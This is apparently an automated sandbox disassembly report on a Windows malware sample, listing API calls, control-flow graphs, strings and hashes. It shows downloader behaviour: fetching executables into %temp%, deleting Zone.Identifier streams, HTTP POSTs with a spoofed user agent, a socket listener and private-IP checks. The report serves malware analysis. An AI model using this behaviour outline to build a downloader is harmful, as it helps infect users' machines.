                                                                    • Instruction ID: 054a0bb403a3dad9bf0ef84f7a0700921875b898f10d87bbce24b5acd7998093
                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                    • Instruction Fuzzy Hash: 4721B872900205AFC710EF79C880967FBA5FF45310B45857EE9559B286E734F925C7E0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                    control_flow_graph 460 40aea0-40aeb7 call 40add0 463 40aeb9 460->463 464 40aebe-40aeda call 40aa20 strcmp 460->464 465 40b145-40b148 463->465 468 40aee1-40aefd call 40aa20 strstr 464->468 469 40aedc 464->469 472 40af40-40af5c call 40aa20 strstr 468->472 473 40aeff-40af1b call 40aa20 strstr 468->473 469->465 480 40af5e-40af7a call 40aa20 strstr 472->480 481 40af9f-40afbb call 40aa20 strstr 472->481 478 40af3b 473->478 479 40af1d-40af39 call 40aa20 strstr 473->479 478->465 479->472 479->478 488 40af9a 480->488 489 40af7c-40af98 call 40aa20 strstr 480->489 490 40afbd-40afd9 call 40aa20 strstr 481->490 491 40affe-40b014 EnterCriticalSection 481->491 488->465 489->481 489->488 502 40aff9 490->502 503 40afdb-40aff7 call 40aa20 strstr 490->503 492 40b01f-40b028 491->492 495 40b059-40b064 call 40b150 492->495 496 40b02a-40b03a 492->496 509 40b13a-40b13f LeaveCriticalSection 495->509 510 40b06a-40b078 495->510 499 40b057 496->499 500 40b03c-40b055 call 40d4a0 496->500 499->492 500->495 502->465 503->491 503->502 509->465 512 40b07a 510->512 513 40b07e-40b08f call 409d90 510->513 512->513 513->509 516 40b095-40b0b2 call 40d4a0 513->516 519 40b0b4-40b0c4 516->519 520 40b10a-40b122 516->520 521 40b0d0-40b108 call 40a1b0 519->521 522 40b0c6-40b0ce Sleep 519->522 523 40b128-40b133 call 40b150 520->523 521->523 522->519 523->509 528 40b135 call 40ab80 523->528 528->509
                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                                    control_flow_graph 530 401920-401947 GetTickCount WaitForSingleObject 531 401ac9-401acf 530->531 532 40194d-401964 WSAWaitForMultipleEvents 530->532 533 4019f0-401a03 GetTickCount 532->533 534 40196a-401981 WSAEnumNetworkEvents 532->534 535 401a43-401a4c GetTickCount 533->535 536 401a05-401a14 EnterCriticalSection 533->536 534->533 537 401983-401988 534->537 538 401ab5-401ac3 WaitForSingleObject 535->538 539 401a4e-401a5d EnterCriticalSection 535->539 540 401a16-401a1d 536->540 541 401a3a-401a41 LeaveCriticalSection 536->541 537->533 542 40198a-401990 537->542 538->531 538->532 543 401aa1-401ab1 LeaveCriticalSection GetTickCount 539->543 544 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 539->544 545 401a35 call 401820 540->545 546 401a1f-401a27 540->546 541->538 542->533 547 401992-4019b1 accept 542->547 543->538 555 401a97-401a9f 544->555 556 401a79-401a82 544->556 545->541 546->540 549 401a29-401a30 LeaveCriticalSection 546->549 547->533 551 4019b3-4019c2 call 4022c0 547->551 549->538 551->533 557 4019c4-4019df call 401740 551->557 555->543 555->544 556->555 558 401a84-401a8d call 40ab40 556->558 557->533 563 4019e1-4019e7 557->563 558->555 563->533 564 4019e9-4019eb call 401cf0 563->564 564->533
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                    Control-flow Graph (rendered image not present in this copy; basic blocks and edges recovered from the graph data)
                                                                    • 679 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA -> 680, 681
                                                                    • 680 40dc61-40dc94 InternetConnectA -> 682, 683
                                                                    • 681 40ddd7-40dde0 (no successors)
                                                                    • 682 40ddca-40ddd1 InternetCloseHandle -> 681
                                                                    • 683 40dc9a-40dcca HttpOpenRequestA -> 684, 685
                                                                    • 684 40dcd0-40dce7 HttpSendRequestA -> 686, 687
                                                                    • 685 40ddbd-40ddc4 InternetCloseHandle -> 682
                                                                    • 686 40ddb0-40ddb7 InternetCloseHandle -> 685
                                                                    • 687 40dced-40dcf1 -> 688, 689
                                                                    • 688 40dda6 -> 686
                                                                    • 689 40dcf7 -> 690
                                                                    • 690 40dd01-40dd08 -> 691, 692
                                                                    • 691 40dd99-40dda4 -> 686
                                                                    • 692 40dd0e-40dd30 InternetReadFile -> 693, 694
                                                                    • 693 40dd32-40dd39 -> 694, 695
                                                                    • 694 40dd3b -> 691
                                                                    • 695 40dd3d-40dd94 call 409fe0 memcpy -> 690
                                                                    • Read loop: 690 -> 692 (InternetReadFile) -> 693 -> 695 (memcpy) -> 690; blocks 686 -> 685 -> 682 -> 681 are the three InternetCloseHandle calls on the way out
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040DBE8
                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                    • String ID: <$GET
                                                                    • API String ID: 1205665004-427699995
                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                    • String ID: .Mw
                                                                    • API String ID: 3902698870-2453323595
                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                    • String ID: Vz@$.Mw
                                                                    • API String ID: 439099756-60430008
                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                    • String ID:
                                                                    • API String ID: 3862671961-0
                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
